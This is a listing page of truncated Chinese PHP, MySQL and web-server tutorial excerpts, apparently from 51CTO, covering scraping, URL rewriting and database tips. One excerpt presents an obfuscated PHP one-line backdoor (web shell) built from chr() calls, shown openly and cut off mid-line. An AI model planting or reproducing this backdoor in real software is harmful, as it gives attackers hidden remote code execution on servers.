QueryList的出现让PHP做采集从未如此简单。得益于phpQuery,让使用QueryList几乎没有任何学习成本,只要会CSS3选择器就可以轻松使用QueryList了,和jQuery选择器用法完全通用,它让PHP做采集像jQuery选择元素一样简单。初探看看PHP用QueryList做采集到底有多简洁吧!<?phpuseQL\QueryList;//采集某页面所有的图片$data=
对于数据量大的首先如果有field最好限制field,而且可以分批处理,每次取5000(固定数量)$userCount=D('model')->count();for($i=0;$i<ceil($userCount/5000);$i++){$begin=$i*5000;$end=($i+1)*5000;$userList=D('model')->field('key_name')
登录wdcp后台-Mysql管理-phpmyadmin输入Mysql的root密码登录进入示例代码:<fontcolor=redsize=3>updatemysql.usersethost='%'whereuser='west263test';</font>#执行前注意west263test需要修改成自己的数据库用户名<fontcolo
微擎
PHP环境是IIS+PHP5.6版本 隐藏index.php1、站点下选择URL重写2、添加规则-入站规则-空白规则3、编辑入站规则名称:自定义模式:^(.*)$4、条件选择不是文件;不是目录5、操作属性 重写URL:index.php/{R:1}
使用phpmyadmin进行备份还原数据库的时候,通常使用的是在线上传功能,这功能的最大bug就是如果你网络状态不是很好,很可能不小心就中断了导入或者导出的操作。找到phpmyadmin的安装目录 config.inc.php文件里找到:$cfg['UploadDir'] = 'upload'; $cfg['SaveDir'] = 'save';这两个参数可
如果是采用IIS+ISAPI的话,就是使用TS版本。如果是采用IIS+FastCGI的话,就使用NTS版本。
函数名 释义 介绍htmlspecialchars将与、单双引号、大于和小于号化成HTML格式&转成& "转成"' 转成'<转成<>转成>htmlentities()所有字符都转成HTML格式除上面htmlspecialchars字符外,还包括双字节字符显示成编码等。a
/** * 模拟post进行url请求 * @param string $url * @param string $param  
1、开启rewrite_module鼠标左键点击PHPStudy的 其他选项菜单,在PHP扩展及设置->Apache模块找到rewrite_module,点击即开启本模块。PHPStudy会自动重启服务。2、修改httpd.conf文件在 其他选项菜单->打开配置文件->httpd.conf,点击即可打开httpd.conf文件。找到:AllowOverride None修改为:
之前老左分享过一篇"LNMP系列教程之五:设置301重定向的方法"一文,我们可以很容易的在nginx环境下设置301跳转。一般而言,我们使用的301跳转就是WWW与不带WWW域名之间的跳转,用行话说就是权重要归一。对于我们使用Apache环境的来说其实相对nginx比较简单,因为只需要我们在网站根目录有.htaccess文件。如果我们的网站,比如wordpress根目录有htaccess文件之后,
字符/ 意义:对于字符,通常表示按字面意义,指出接着的字符为特殊字符,不作解释。 例如:/b/匹配字符'b',通过在b 前面加一个反斜杠,也就是/b/,则该字符变成特殊字符,表示 匹配一个单词的分界线。 或者: 对于几个字符,通常说明是特殊的,指出紧接着的字符不是特殊的,而应该按字面解释。 例如:*是一个特殊字
本文将通过案例,整合浏览器工具与PHP程序,教你如何让数据 唾手可得 。对于做过数据采集的人来说,cURL一定不会陌生。虽然在PHP中有file_get_contents函数可以获取远程链接的数据,但是它的可控制性太差了,对于各种复杂情况的采集情景,file_get_contents显得有点无能为力。因此,本文将为你介绍采集神器cURL的使用。工具火狐浏览器(FireFox)
有时可能需要批量替换数据库中某个字段的的部分内容,可以用如下的操作:update test set Content = REPLACE(Content,'abc001','test') where IDX = 2 AND Content REGEXP 'http://static.abc001.com/123.jpg';
在开始这个话题之前我们首先来做一个小实验,比较一下REGEXP和Like他们两个哪个效率高,如果效率太低,我们就没有必要做过多的研究了,实验的代码如下:<?phpRequire("config.php");//函数:计时函数//用法:Echo Runtime(1);Function Runtime($mode=0){ Static $s; &nb
我想实现的是每次根据给出的关键词搜索百度结果页其中php抓取代码如下:<?php$url = "http://www.baidu.com/s?wd=生命动力";// 构造包头,模拟浏览器请求$header = array ( "Host:www.baidu.com", "Content-Type:application/x-www-form-urlencoded",//post请求 "
PHPCMS平台的注入漏洞太多,防不胜防,为此我想了个设置PHP程序访问限制的方法。只允许访问以下四个PHP程序:/index.php/admin.php/api.php/phpsso_server/index.php其它一律禁止访问。 以下是apache中虚拟主机增加的重写定义: RewriteEngine On Rew
用php的正则表达式相关函数,实现提取html超链接<a href="地址"></a>中的地址<?php$preg='/<a .*?href="(.*?)".*?>/is';$str ='<a href="链接1">URLNAME</a>文本段1<a href="链接2" target="_blank">URLNAME&
要提取google搜索的部分数据,发现google对于软件抓取它的数据屏蔽的厉害,以前伪造下 USER-AGENT 就可以抓数据,但是现在却不行了。利用抓包数据发现,Google 判断了 cookies,当你没有cookies的时候,直接返回 302 跳转,而且是连续几十个302跳转,根本抓不了数据。因此,在发送搜索命令时,需要先提取 cookies 并保存,然后利用保存下来的这个cookies再
一、定义Cookie存储路径必须使用绝对路径$cookie_jar = dirname(__FILE__)."/pic.cookie";//$cookie_file = dirname(__FILE__).'/cookie.txt';//$cookie_file = tempnam("tmp","cookie");二、获取Cookie$url = "http://1.2.3.4/";$ch = c
强悍的PHP一句话后门常用一:<?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82
使用某些PHP服务器套件开发PHP程序的时候,调用date函数输出时间会少8小时,下面提供一个解决的方法。<?php date_default_timezone_set('PRC'); echo date("Y-m-d H:i:s",time()); ?>
php获取访客所在城市名称代码,采用纯真QQ IP数据库,想要使用最新版IP数据库可到纯真官网获取。纯真IP数据库官网:http://www.cz88.net/将下载的IP数据库文件替换压缩包中的qqwry.dat文件即可。压缩包下载:php获取访客所在城市名称代码代码如下:$ip=getip(); $area=convertip($ip); $city = explode("
从织梦DeDeCMS中提取的zip压缩文件操作类,包含zip文件压缩、解压缩、添加文件到压缩包中等多个实用的函数,注释详细方便使用。下载:dedecms中提取的zip压缩文件操作类zip.class.php包含的函数和简单的使用方法:1.函数get_List($zip_name) ,函数作用:获取zip文件中的文件列表。函数参数 $zip_name zip文件名。返回值 文件列表数组。
本文主要列举两张和三张表来讲述多表连接查询。新建两张表:表1:student 截图如下:表2:course 截图如下:(此时这样建表只是为了演示连接SQL语句,当然实际开发中我们不会这样建表,实际开发中这两个表会有自己不同的主键。)一、外连接外连接可分为:左连接、右连接、完全外连接。1、左连接 left join 或 left outer joinSQL语句:s
今天配置了一台新服务器,使用的是IIS + Fastcgi + PHP 5.3.X,在默认网站下运行都是正常的,但是新增一台虚拟主机或网站访问php页面的时候就会报错“No input file specified”。按照网上的各种解决方法,如屏蔽doc_root、给目录加权限、修改缓冲池等等都无效。后来发现一个解决的文档,找着试了确实管用,方法如下:打开php.ini文件,这个你看你怎么配置的了
1、首先php从5.2中已经修改为FastCGI方式安装,所以安装最新版的php5.4需要先安装fastcgi,fastcgi的下载地址如下:http://www.iisboy.com/iis_down/552.html下载后直接运行安装2、下载php最新代码下载地址:http://windows.php.net/download/下载非线程安全的即可,可根据实际需要下载对应的版本3、要想运行ph
php匹配指定div内容,在用php编写采集程序的时候,抓取到的网页数据有时候我们只需要一小段标签内容,怎么才能冲html代码中提取出来呢,这里提供一个函数示例,实现php匹配任意html标签内的所有内容:/** * 匹配任意id的html标签内容 * */ function getWebTag($tag_id,$tag='div',$data=false){&nb
1、windows 的计划任务2、linux的脚本程序3、让web浏览器定时刷新具体实现1、windows计划任务PHP很少在win服务器上跑,具体实现也不再深究,看网上实现的原理大概是写bat脚本,然后让window任务添加执行这个bat脚本: 在网上找了些WINDOWS执行PHP的计划任务的方法,有一个写得很全,可惜在我这竟然没通过。最后不得不综合各门派的方法,才能在我这运行成功。1
如果gbk编码的页面生成的地址链接到utf-8的页面,gbk页面的中文是按照gbk的格式编码传送给下个页面,那么utf-8编码接收后肯定会出现乱码。IIS的url重写模块,重写后的中文编码也是gbk,如果你的页面是utf-8编码,那么重写参数将会失效。像这些情况,我们就需要使用php内置的转码函数来处理编码问题了:方案1:$str = iconv("gb2312","utf-8",$str);或者
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号